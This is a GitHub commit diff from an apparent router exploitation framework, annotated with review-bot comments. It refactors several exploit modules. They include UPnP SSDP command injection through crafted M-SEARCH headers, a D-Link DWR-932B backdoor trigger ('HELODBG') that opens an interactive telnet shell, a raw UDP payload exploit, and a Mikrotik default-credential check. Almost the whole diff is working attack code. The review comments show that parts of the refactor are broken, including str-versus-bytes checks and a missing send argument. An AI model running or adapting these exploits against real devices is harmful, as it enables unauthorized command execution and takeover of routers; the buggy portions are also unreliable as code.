Unverified Commit 0401a67f by Marcin Bury Committed by GitHub

TCP & UDP based exploits (#451)

* Fixing TCP & UDP based exploits

* Fixing Mikrotik API ROS
parent 214a5447
......@@ -71,6 +71,7 @@ class Exploit(TCPClient):
def check(self):
tcp_client = self.tcp_connect()
if tcp_client:
self.tcp_close(tcp_client)
return True
return False
......@@ -78,7 +79,8 @@ class Exploit(TCPClient):
def check_default(self):
self.credentials = []
self.run_threads(self.target_function, self.defaults)
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
if self.credentials:
return self.credentials
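Review bot: check() in the first hunk reports True on any successful tcp_connect(), so a reachable port running something other than the Mikrotik API ROS service is still flagged as vulnerable; a comment such as `# reachability only - does not verify that the API ROS service answers` would make that limit explicit to callers of check(). In the second hunk, check_default() continues outside the hunk, so whether the fallthrough when `self.credentials` stays empty is handled cannot be seen here.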
......@@ -35,42 +35,40 @@ class Exploit(UDPClient):
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:uuid:`" + cmd + "`\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
cmd = bytes(cmd, "utf-8")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
sock.close()
except socket.error:
pass
request = (
b"M-SEARCH * HTTP/1.1\r\n" +
b"Host:239.255.255.250:1900\r\n" +
b"ST:uuid:`" + cmd + b"`\r\n" +
b"Man:\"ssdp:discover\"\r\n" +
b"MX:2\r\n\r\n"
)
udp_client = self.udp_create()
self.udp_send(udp_client, request)
self.udp_close(udp_client)
return ""
@mute
def check(self):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:upnp:rootdevice\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
request = (
b"M-SEARCH * HTTP/1.1\r\n"
b"Host:239.255.255.250:1900\r\n"
b"ST:upnp:rootdevice\r\n"
b"Man:\"ssdp:discover\"\r\n"
b"MX:2\r\n\r\n"
)
udp_client = self.udp_create()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
response = sock.recv(65535)
sock.close()
except Exception:
return False # target is not vulnerable
if udp_client:
self.udp_send(udp_client, request)
response = self.udp_recv(udp_client, 65535)
self.udp_close(udp_client)
if "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
if response and "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
return False # target is not vulnerable
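Review bot: `"Linux, UPnP/1.0, DIR-" in response` at the end of check() tests a str against the value returned by udp_recv, which this same commit treats as bytes elsewhere (`str(response[8:], "utf-8")` in the last file), so a real response would raise TypeError instead of returning True; the literal should be `b"Linux, UPnP/1.0, DIR-"`. The DWR-932B check() has the same str-in-bytes test with `"Hello" in response`. Separately, execute() calls udp_send/udp_close without the `if udp_client:` guard that check() applies, so a failed udp_create() behaves differently in the two methods.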
......@@ -30,16 +30,19 @@ class Exploit(UDPClient):
shell(self, architecture="mipsle")
def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n'
'HOST:' + self.target + ':1900\r\n'
'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
'MX:2\r\n'
'MAN:"ssdp:discover"\r\n\r\n')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.target, 1900))
s.send(buf)
s.close()
request = (
"M-SEARCH * HTTP/1.1\r\n" +
"HOST:{}:{}\r\n".format(self.target, self.port) +
"ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
"MX:2\r\n" +
"MAN:\"ssdp:discover\"\r\n\r\n"
)
request = bytes(request, "utf-8")
udp_client = self.udp_create()
self.udp_send(udp_client)
self.udp_close(udp_client)
return ""
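Review bot: `self.udp_send(udp_client)` in execute() never passes the `request` that was just built and encoded, so either nothing is sent or the call fails on the missing argument, depending on udp_send's signature; it should read `self.udp_send(udp_client, request)`. As in the other UDP modules in this commit, execute() also uses `udp_client` without checking that udp_create() returned one.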
......
import socket
import telnetlib
from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.core.udp.udp_client import UDPClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(TCPClient, TelnetClient):
class Exploit(UDPClient, TelnetClient):
__info__ = {
"name": "D-Link DWR-932B",
"description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows "
......@@ -23,48 +21,27 @@ class Exploit(TCPClient, TelnetClient):
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(23, "Target Telnet port")
port = OptPort(39889, "Target Telnet port")
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
print_status("Sending backdoor packet...")
response = ""
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except Exception:
pass
sock.close()
if "Hello" in response:
print_success("Target seems to vulnerable")
print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except Exception:
print_status("Sending backdoor packet")
if self.check():
telnet_client = self.telnet_connect(port=23)
if telnet_client:
self.telnet_interactive(telnet_client)
self.telnet_close(telnet_client)
else:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
udp_client = self.udp_create()
self.udp_send(udp_client, b"HELODBG")
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except Exception:
pass
response = self.udp_recv(udp_client, 1024)
if response and "Hello" in response:
return True # target is vulnerable
return False # target is not vulnerable
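Review bot: `port = OptPort(39889, "Target Telnet port")` keeps the telnet description while the value is now the UDP backdoor port, and run() connects to telnet with a hard-coded `port=23`; the option text should say something like `"Target UDP port"`, with a separate option if the telnet port is meant to stay configurable. In check(), the client returned by udp_create() is never passed to udp_close(), unlike the other modules touched by this commit. `"Hello" in response` tests a str against a response the commit treats as bytes elsewhere and should be `b"Hello"`.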
import socket
from routersploit.core.exploit import*
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
......@@ -62,36 +61,24 @@ class Exploit(UDPClient):
b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
)
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
self.content = ""
try:
print_status("Waiting for response")
response = sock.recv(1024)
except Exception:
def run(self):
if self.check():
print_status("Target returned data")
print_info(self.content)
else:
print_error("Exploit failed - device seems to be not vulnerable")
return
if len(response):
print_success("Exploit success")
print_info(response)
@mute
def check(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.sendto(self.payload, (self.target, 43690))
try:
response = sock.recv(1024)
except Exception:
return False # target is not vulnerable
udp_client = self.udp_create()
self.udp_send(udp_client, self.payload)
response = self.udp_recv(udp_client, 1024)
self.udp_close(udp_client)
if len(response):
if response:
self.content = response
return True # target is vulnerable
return False # target is not vulnerable
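Review bot: `import socket` is kept at the top of the file while the socket calls in run() and check() were replaced by the UDPClient helpers, so it is presumably unused now; the rest of the file is outside the hunks, so confirm before dropping it. check() also stores the response only as an instance attribute `self.content` after a successful probe; a class-level default such as `content = b""` would keep reads of it safe when check() has not run or returned False.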
......@@ -39,6 +39,7 @@ class Exploit(UDPClient):
udp_client = self.udp_create()
self.udp_send(udp_client, payload)
response = self.udp_recv(udp_client, 1024)
self.udp_close(udp_client)
if response:
return str(response[8:], "utf-8")
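Review bot: `str(response[8:], "utf-8")` decodes device output strictly, so a response containing non-UTF-8 bytes raises UnicodeDecodeError out of the module rather than returning a value; `str(response[8:], "utf-8", errors="replace")` keeps the call total. The enclosing function starts and ends outside the hunk, so what happens when `response` is empty is not visible here.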
......
from routersploit.modules.creds.routers.mikrotik.api_ros_default_creds import Exploit
def test_check_success(tcp_target):
""" Test scenario - testing against mikrotik api ros server """
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
# assert exploit.check_default() is None
# assert exploit.run() is None
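Review bot: The two commented-out asserts at the end of test_check_success are dead code; either remove them or move them into a test that can actually run against the fixture. The docstring carries stray spaces inside the quotes; the PEP 257 form is `"""Test scenario - testing against mikrotik api ros server."""`.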